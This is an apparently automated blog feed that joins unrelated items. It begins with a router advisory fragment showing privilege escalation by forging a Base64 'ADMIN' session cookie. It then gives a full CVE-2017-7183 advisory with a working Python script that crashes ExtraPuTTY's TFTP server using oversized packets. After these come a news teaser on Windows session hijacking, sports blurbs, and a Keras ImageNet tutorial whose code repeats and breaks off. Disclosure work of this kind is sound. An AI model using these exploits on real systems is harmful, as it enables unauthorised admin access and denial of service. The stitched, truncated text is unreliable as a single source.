1) Log in to the router as a User; the router sets the session cookie value to VVNFUg== (Base64 encoding of "USER").
2) Encode "ADMIN" to Base64 and force-set the session cookie value to QURNSU4=.
3) Refresh the page; your USER privileges are now escalated to ADMIN.

Proof Of Concept 2:
==================
http://ift.tt/2n6Q36x

Disclosure Timeline:
======================================
Vendor Notification: 13/03/17
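The cookie forgery described in this advisory boils down to re-encoding a role string. A minimal Python sketch of the idea (the login flow and cookie name are not specified in the advisory and are omitted here):

```python
import base64

# The router stores the logged-in role as a Base64-encoded session cookie value.
user_cookie = base64.b64encode(b"USER").decode()    # value the router sets at login
admin_cookie = base64.b64encode(b"ADMIN").decode()  # forged replacement value

print(user_cookie)   # VVNFUg==
print(admin_cookie)  # QURNSU4=
```

Because the role is trusted client-side, swapping the cookie value is all the "exploit" requires.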

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2017-7183 ExtraPuTTY v029_RC2 TFTP Denial Of Service

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://ift.tt/2nKaapF
[+] ISR: ApparitionSec

Vendor:
==================
www.extraputty.com

Product:
======================
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773

Also Vulnerable:
v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91

ExtraPuTTY is a fork of the 0.67 version of PuTTY. ExtraPuTTY has all the features of the original software and adds others. Below is a short list of the principal features (see all features):
DLL frontend
TestStand API (LabWindows, TestStand 2012)
timestamp StatusBar
Scripting a session with Lua 5.3
Automatic sequencing of commands
Shortcuts for pre-defined commands
Keyboard shortcuts for pre-defined commands
Portability (use of directory structure)
Integrates FTP, TFTP, SCP, SFTP, Ymodem, Xmodem transfer protocols
Integrates PuTTYcyg, PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change PuTTY settings during session
PuTTYcmdSender: tool to send commands or keyboard shortcuts to multiple PuTTY windows

Vulnerability Type:
=======================
TFTP Denial of Service

CVE Reference:
==============
CVE-2017-7183

Security Issue:
================
The TFTP server component of ExtraPuTTY is vulnerable to a remote Denial of Service attack triggered by sending large junk UDP Read/Write TFTP protocol request packets. Open the ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, then run the Python exploit below.

Then, BOOM (100c.30c):
Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
eax=00000000 ebx=0929ee98 ecx=00000174 edx=7efefeff esi=00000002 edi=00000000
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!ZwWaitForMultipleObjects+0x15:

Exploit/POC:
=============
import socket

print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"

TARGET = raw_input("[IP]>")
TYPE = int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH = "A" * 2000
PORT = 69

if TYPE == 1:
    PAYLOAD = "\x00\x01"            # TFTP Read Request (RRQ) opcode
    PAYLOAD += CRASH + "\x00"
    PAYLOAD += "netascii\x00"
elif TYPE == 2:
    PAYLOAD = "\x00\x02"            # TFTP Write Request (WRQ) opcode
    PAYLOAD += CRASH + "\x00"
    PAYLOAD += "netascii\x00"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto("\x00\x01TEST\x00netascii\x00", (TARGET, PORT))
    recv = s.recvfrom(255)
    if recv != None:
        print "Crashing ExtraPuTTY TFTP server at : %s" % (TARGET)
        s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
    print 'Server not avail, try later'

s.close()

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
===============================
Vendor Notification: No reply
March 20, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password

You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users' session, including domain admin/system user, without knowing their passwords? Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack


from The Hacker News http://ift.tt/2mN2NwL
via IFTTT

Orioles Interview: Pedro Alvarez covers adjusting to outfield, waiting for contract in offseason; listen now in ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

NFL Free Agency: Former Cowboys CB Brandon Carr signs 1-year, $6M deal with Ravens, includes 3 team options for 2018-20 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ImageNet: VGGNet, ResNet, Inception, and Xception with Keras

A few months ago I wrote a tutorial on how to classify images using Convolutional Neural Networks (specifically, VGG16) pre-trained on the ImageNet dataset with Python and the Keras deep learning library.

The pre-trained networks inside of Keras can recognize, with high accuracy, 1,000 different object categories similar to the objects we encounter in our day-to-day lives.

Back then, the pre-trained ImageNet models were separate from the core Keras library, requiring us to clone a free-standing GitHub repo and then manually copy the code into our projects.

This solution worked well enough; however, since my original blog post was published, the pre-trained networks (VGG16, VGG19, ResNet50, Inception V3, and Xception) have been fully integrated into the Keras core (no need to clone down a separate repo anymore) — these implementations can be found inside the applications sub-module.

Because of this, I’ve decided to create a new, updated tutorial that demonstrates how to utilize these state-of-the-art networks in your own classification projects.

Specifically, we’ll create a special Python script that can load any of these networks using either a TensorFlow or Theano backend, and then classify your own custom input images.

To learn more about classifying images with VGGNet, ResNet, Inception, and Xception, just keep reading.

Looking for the source code to this post?
Jump right to the downloads section.

VGGNet, ResNet, Inception, and Xception with Keras

In the first half of this blog post I’ll briefly discuss the VGG, ResNet, Inception, and Xception network architectures included in the Keras library.

We’ll then create a custom Python script using Keras that can load these pre-trained network architectures from disk and classify your own input images.

Finally, we’ll review the results of these classifications on a few sample images.

State-of-the-art deep learning image classifiers in Keras

Keras ships out-of-the-box with five Convolutional Neural Networks that have been pre-trained on the ImageNet dataset:

  1. VGG16
  2. VGG19
  3. ResNet50
  4. Inception V3
  5. Xception

Let’s start with an overview of the ImageNet dataset and then move into a brief discussion of each network architecture.

What is ImageNet?

ImageNet is formally a project aimed at (manually) labeling and categorizing images into almost 22,000 separate object categories for the purpose of computer vision research.

However, when we hear the term “ImageNet” in the context of deep learning and Convolutional Neural Networks, we are likely referring to the ImageNet Large Scale Visual Recognition Challenge, or ILSVRC for short.

The goal of this image classification challenge is to train a model that can correctly classify an input image into 1,000 separate object categories.

Models are trained on ~1.2 million training images with another 50,000 images for validation and 100,000 images for testing.

These 1,000 image categories represent object classes that we encounter in our day-to-day lives, such as species of dogs, cats, various household objects, vehicle types, and much more. You can find the full list of object categories in the ILSVRC challenge here.

When it comes to image classification, the ImageNet challenge is the de facto benchmark for computer vision classification algorithms — and the leaderboard for this challenge has been dominated by Convolutional Neural Networks and deep learning techniques since 2012.

The state-of-the-art pre-trained networks included in the Keras core library represent some of the highest performing Convolutional Neural Networks on the ImageNet challenge over the past few years. These networks also demonstrate a strong ability to generalize to images outside the ImageNet dataset via transfer learning, such as feature extraction and fine-tuning.

VGG16 and VGG19

Figure 1: A visualization of the VGG architecture (source).

The VGG network architecture was introduced by Simonyan and Zisserman in their 2014 paper, Very Deep Convolutional Networks for Large Scale Image Recognition.

This network is characterized by its simplicity, using only 3×3 convolutional layers stacked on top of each other in increasing depth. Reducing volume size is handled by max pooling. Two fully-connected layers, each with 4,096 nodes, are then followed by a softmax classifier (above).

The “16” and “19” stand for the number of weight layers in the network (columns D and E in Figure 2 below):

Figure 2: Table 1 of Very Deep Convolutional Networks for Large Scale Image Recognition, Simonyan and Zisserman (2014).

In 2014, 16 and 19 layer networks were considered very deep (although we now have the ResNet architecture which can be successfully trained at depths of 50-200 for ImageNet and over 1,000 for CIFAR-10).

Simonyan and Zisserman found training VGG16 and VGG19 challenging (specifically regarding convergence on the deeper networks), so in order to make training easier, they first trained smaller versions of VGG with fewer weight layers (columns A and C).

The smaller networks converged and were then used as initializations for the larger, deeper networks — this process is called pre-training.

While making logical sense, pre-training is a very time consuming, tedious task, requiring an entire network to be trained before it can serve as an initialization for a deeper network.

We no longer use pre-training (in most cases) and instead prefer Xavier/Glorot initialization or MSRA initialization (sometimes called He et al. initialization from the paper, Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification). You can read more about the importance of weight initialization and the convergence of deep neural networks inside All you need is a good init, Mishkin and Matas (2015).
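Both schemes simply scale random weights by the layer's fan-in/fan-out so that activations neither explode nor vanish as depth grows. A minimal NumPy sketch (the layer sizes here are arbitrary, for illustration only):

```python
import numpy as np

def glorot_uniform(fan_in, fan_out, rng):
    # Xavier/Glorot: uniform in [-limit, limit], limit = sqrt(6 / (fan_in + fan_out))
    limit = np.sqrt(6.0 / (fan_in + fan_out))
    return rng.uniform(-limit, limit, size=(fan_in, fan_out))

def he_normal(fan_in, fan_out, rng):
    # MSRA/He: zero-mean Gaussian with std = sqrt(2 / fan_in), suited to ReLU layers
    return rng.normal(0.0, np.sqrt(2.0 / fan_in), size=(fan_in, fan_out))

rng = np.random.RandomState(42)
W1 = glorot_uniform(512, 256, rng)  # one 512 -> 256 weight matrix
W2 = he_normal(512, 256, rng)
```

Unlike pre-training, these initializations are computed in closed form, so no throwaway network ever needs to be trained.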

Unfortunately, there are two major drawbacks with VGGNet:

  1. It is painfully slow to train.
  2. The network architecture weights themselves are quite large (in terms of disk/bandwidth).

Due to its depth and number of fully-connected nodes, VGG is over 533MB for VGG16 and 574MB for VGG19. This makes deploying VGG a tiresome task.
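Most of that size comes from the fully-connected head rather than the convolutions; a quick back-of-the-envelope count for VGG16 (the widely-reported total is roughly 138M parameters):

```python
# Parameter count of VGG16's three fully-connected layers: the final
# 7x7x512 conv volume is flattened into the first FC layer.
fc6 = 7 * 7 * 512 * 4096   # 102,760,448 weights
fc7 = 4096 * 4096          #  16,777,216 weights
fc8 = 4096 * 1000          #   4,096,000 weights (1,000 ImageNet classes)

total_fc = fc6 + fc7 + fc8
print(total_fc)  # 123633664 -- ~124M of VGG16's ~138M total parameters
```

At 4 bytes per float32 weight, the FC head alone accounts for roughly 494MB of the serialized model, which is why the architectures below that drop the FC layers are so much smaller.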

We still use VGG in many deep learning image classification problems; however, smaller network architectures are often more desirable (such as SqueezeNet, GoogLeNet, etc.).

ResNet

Unlike traditional sequential network architectures such as AlexNet, OverFeat, and VGG, ResNet is instead a form of “exotic architecture” that relies on micro-architecture modules (also called “network-in-network architectures”).

The term micro-architecture refers to the set of “building blocks” used to construct the network. A collection of micro-architecture building blocks (along with your standard CONV, POOL, etc. layers) leads to the macro-architecture (i.e., the end network itself).

First introduced by He et al. in their 2015 paper, Deep Residual Learning for Image Recognition, the ResNet architecture has become a seminal work, demonstrating that extremely deep networks can be trained using standard SGD (and a reasonable initialization function) through the use of residual modules:

Figure 3: The residual module in ResNet as originally proposed by He et al. in 2015.

Further accuracy can be obtained by updating the residual module to use identity mappings, as demonstrated in their 2016 followup publication, Identity Mappings in Deep Residual Networks:

Figure 4: (Left) The original residual module. (Right) The updated residual module using pre-activation.

That said, keep in mind that the ResNet50 (as in 50 weight layers) implementation in the Keras core is based on the former 2015 paper.

Even though ResNet is much deeper than VGG16 and VGG19, the model size is actually substantially smaller due to the usage of global average pooling rather than fully-connected layers — this reduces the model size down to 102MB for ResNet50.
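Global average pooling collapses each feature map to a single mean value, so the classifier sees one number per channel instead of an entire flattened spatial grid. A NumPy sketch of the operation (the batch size and shapes are illustrative):

```python
import numpy as np

# Final conv volume of a ResNet50-style network: (batch, 7, 7, 2048)
features = np.random.rand(4, 7, 7, 2048)

# Global average pooling: average over the two spatial dimensions only
pooled = features.mean(axis=(1, 2))

print(pooled.shape)  # (4, 2048) -- just 2048 inputs per image to the classifier,
# versus 7 * 7 * 2048 = 100352 inputs if we had flattened the volume instead
```

That ~50x reduction in classifier inputs is what lets ResNet50 ship in ~102MB despite its depth.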

Inception V3

The “Inception” micro-architecture was first introduced by Szegedy et al. in their 2014 paper, Going Deeper with Convolutions:

Figure 5: The original Inception module used in GoogLeNet.

The goal of the inception module is to act as a “multi-level feature extractor” by computing 1×1, 3×3, and 5×5 convolutions within the same module of the network — the outputs of these filters are then stacked along the channel dimension before being fed into the next layer in the network.
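The channel-wise stacking can be sketched with NumPy arrays standing in for the branch outputs. Same-padding keeps the spatial size equal across branches; the filter counts below are illustrative (the original module also includes a max-pool projection branch, shown here as a fourth array):

```python
import numpy as np

# Outputs of the parallel branches on a 28x28 feature map (same padding)
branch_1x1 = np.zeros((1, 28, 28, 64))
branch_3x3 = np.zeros((1, 28, 28, 128))
branch_5x5 = np.zeros((1, 28, 28, 32))
pool_proj  = np.zeros((1, 28, 28, 32))

# Stack along the channel dimension to form the module's output volume
output = np.concatenate([branch_1x1, branch_3x3, branch_5x5, pool_proj], axis=-1)
print(output.shape)  # (1, 28, 28, 256)
```

Each branch sees the same input, so the next layer receives features extracted at multiple receptive-field sizes simultaneously.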

The original incarnation of this architecture was called GoogLeNet, but subsequent manifestations have simply been called Inception vN where N refers to the version number put out by Google.

The Inception V3 architecture included in the Keras core comes from the later publication by Szegedy et al., Rethinking the Inception Architecture for Computer Vision (2015) which proposes updates to the inception module to further boost ImageNet classification accuracy.

The weights for Inception V3 are smaller than both VGG and ResNet, coming in at 96MB.

Xception

Figure 6: The Xception architecture.

Xception was proposed by none other than François Chollet himself, the creator and chief maintainer of the Keras library.

Xception is an extension of the Inception architecture which replaces the standard Inception modules with depthwise separable convolutions.
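The appeal of depthwise separable convolutions is largely the parameter count: a k×k depthwise pass over each input channel followed by a 1×1 pointwise mix of channels, instead of one dense k×k convolution across all channels at once. A quick comparison (layer sizes illustrative, bias terms ignored):

```python
def standard_conv_params(k, c_in, c_out):
    # one k x k filter spanning all input channels, per output channel
    return k * k * c_in * c_out

def separable_conv_params(k, c_in, c_out):
    # k x k depthwise (one filter per input channel) + 1x1 pointwise mix
    return k * k * c_in + c_in * c_out

std = standard_conv_params(3, 256, 256)   # 589824
sep = separable_conv_params(3, 256, 256)  # 67840
print(std / sep)  # roughly 8.7x fewer parameters for this layer
```

Applied throughout the network, this factoring is a big part of why Xception's weights serialize smaller than Inception V3's despite comparable accuracy.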

The original publication, Xception: Deep Learning with Depthwise Separable Convolutions can be found here.

Xception sports the smallest weight serialization at only 91MB.

What about SqueezeNet?

Figure 7: The “fire” module in SqueezeNet, consisting of a “squeeze” and an “expand”. (Iandola et al., 2016).

For what it’s worth, the SqueezeNet architecture can obtain AlexNet-level accuracy (~57% rank-1 and ~80% rank-5) at only 4.9MB through the usage of “fire” modules that “squeeze” and “expand”.

Despite its small footprint, however, SqueezeNet can be very tricky to train.

That said, I demonstrate how to train SqueezeNet from scratch on the ImageNet dataset inside my upcoming book, Deep Learning for Computer Vision with Python.

Classifying images with VGGNet, ResNet, Inception, and Xception with Python and Keras

Let’s learn how to classify images with pre-trained Convolutional Neural Networks using the Keras library.

Open up a new file, name it

classify_image.py
 , and insert the following code:
# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

Lines 2-13 import our required Python packages. As you can see, most of the packages are part of the Keras library.

Specifically, Lines 2-6 handle importing the Keras implementations of ResNet50, Inception V3, Xception, VGG16, and VGG19, respectively.

Please note that the Xception network is compatible only with the TensorFlow backend (the class will throw an error if you try to instantiate it with a Theano backend).

Line 7 gives us access to the

imagenet_utils
  sub-module, a handy set of convenience functions that will make pre-processing our input images and decoding output classifications easier.

The remainder of the imports are other helper functions, followed by NumPy for numerical processing and

cv2
  for our OpenCV bindings.

Next, let’s parse our command line arguments:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

We’ll require only a single command line argument,

--image
 , which is the path to our input image that we wish to classify.

We’ll also accept an optional command line argument,

--model
 , a string that specifies which pre-trained Convolutional Neural Network we would like to use — this value defaults to
vgg16
  for the VGG16 network architecture.

Given that we accept the name of our pre-trained network via a command line argument, we need to define a Python dictionary that maps the model names (strings) to their actual Keras classes:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# ensure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

Lines 25-31 define our

MODELS
  dictionary which maps a model name string to the corresponding class.

If the

--model
  name is not found inside
MODELS
 , we’ll raise an
AssertionError
  (Lines 34-36).

A Convolutional Neural Network takes an image as an input and then returns a set of probabilities corresponding to the class labels as output.

Typical input image sizes to a Convolutional Neural Network trained on ImageNet are 224×224, 227×227, 256×256, and 299×299; however, you may see other dimensions as well.

VGG16, VGG19, and ResNet all accept 224×224 input images while Inception V3 and Xception require 299×299 pixel inputs, as demonstrated by the following code block:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# ensure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

Here we initialize our

inputShape
  to be 224×224 pixels. We also initialize our
preprocess
  function to be the standard
preprocess_input
  from Keras (which performs mean subtraction).

However, if we are using Inception or Xception, we need to set the

inputShape
  to 299×299 pixels, followed by updating
preprocess
  to use a separate pre-processing function that performs a different type of scaling.

The next step is to load our pre-trained network architecture weights from disk and instantiate our model:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# ensure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

Line 58 uses the

MODELS
  dictionary along with the
--model
  command line argument to grab the correct
Network
  class.

The Convolutional Neural Network is then instantiated on Line 59 using the pre-trained ImageNet weights.

Note: Weights for VGG16 and VGG19 are > 500MB. ResNet weights are ~100MB, while Inception and Xception weights are between 90-100MB. If this is the first time you are running this script for a given network, these weights will be (automatically) downloaded and cached to your local disk. Depending on your internet speed, this may take a while. However, once the weights are downloaded, they will not need to be downloaded again, allowing subsequent runs of

classify_image.py
  to be much faster.

Our network is now loaded and ready to classify an image — we just need to prepare this image for classification:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# ensure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

# load the input image using the Keras helper utility while ensuring
# the image is resized to `inputShape`, the required input dimensions
# for the ImageNet pre-trained network
print("[INFO] loading and pre-processing image...")
image = load_img(args["image"], target_size=inputShape)
image = img_to_array(image)

# our input image is now represented as a NumPy array of shape
# (inputShape[0], inputShape[1], 3) however we need to expand the
# dimension by making the shape (1, inputShape[0], inputShape[1], 3)
# so we can pass it through the network
image = np.expand_dims(image, axis=0)

# pre-process the image using the appropriate function based on the
# model that has been loaded (i.e., mean subtraction, scaling, etc.)
image = preprocess(image)

Line 65 loads our input image from disk using the supplied

inputShape
  to resize the width and height of the image.

Line 66 converts the image from a PIL/Pillow instance to a NumPy array.

Our input image is now represented as a NumPy array with the shape

(inputShape[0], inputShape[1], 3)
 .

However, we typically train/classify images in batches with Convolutional Neural Networks, so we need to add an extra dimension to the array via

np.expand_dims
  on Line 72.

After calling

np.expand_dims
  the
image
  has the shape
(1, inputShape[0], inputShape[1], 3)
 . Forgetting to add this extra dimension will result in an error when you call
.predict
  of the
model
 .

Lastly, Line 76 calls the appropriate pre-processing function to perform mean subtraction/scaling.

We are now ready to pass our image through the network and obtain the output classifications:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# ensure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

# load the input image using the Keras helper utility while ensuring
# the image is resized to `inputShape`, the required input dimensions
# for the ImageNet pre-trained network
print("[INFO] loading and pre-processing image...")
image = load_img(args["image"], target_size=inputShape)
image = img_to_array(image)

# our input image is now represented as a NumPy array of shape
# (inputShape[0], inputShape[1], 3) however we need to expand the
# dimension by making the shape (1, inputShape[0], inputShape[1], 3)
# so we can pass it through the network
image = np.expand_dims(image, axis=0)

# pre-process the image using the appropriate function based on the
# model that has been loaded (i.e., mean subtraction, scaling, etc.)
image = preprocess(image)

# classify the image
print("[INFO] classifying image with '{}'...".format(args["model"]))
preds = model.predict(image)
P = imagenet_utils.decode_predictions(preds)

# loop over the predictions and display the rank-5 predictions +
# probabilities to our terminal
for (i, (imagenetID, label, prob)) in enumerate(P[0]):
        print("{}. {}: {:.2f}%".format(i + 1, label, prob * 100))

A call to .predict on Line 80 returns the predictions from the Convolutional Neural Network.

Given these predictions, we pass them into the ImageNet utility function .decode_predictions to get a list of ImageNet class label IDs, “human-readable” labels, and the probabilities associated with the labels.

The top-5 predictions (i.e., the labels with the largest probabilities) are then printed to our terminal on Lines 85 and 86.
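The structure that decode_predictions returns can be illustrated with made-up values (the IDs and probabilities below are invented for demonstration):

```python
# decode_predictions returns one list per input image; each inner list
# holds (imagenetID, label, probability) tuples sorted by descending
# probability -- these values are fabricated for illustration
P = [[("n04254680", "soccer_ball", 0.9343),
      ("n02799071", "baseball", 0.0078)]]

# the same display loop used in the script above
for (i, (imagenetID, label, prob)) in enumerate(P[0]):
    print("{}. {}: {:.2f}%".format(i + 1, label, prob * 100))
# 1. soccer_ball: 93.43%
# 2. baseball: 0.78%
```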

The last thing we’ll do here before we close out our example is load our input image from disk via OpenCV, draw the #1 prediction on the image, and finally display the image to our screen:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# ensure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
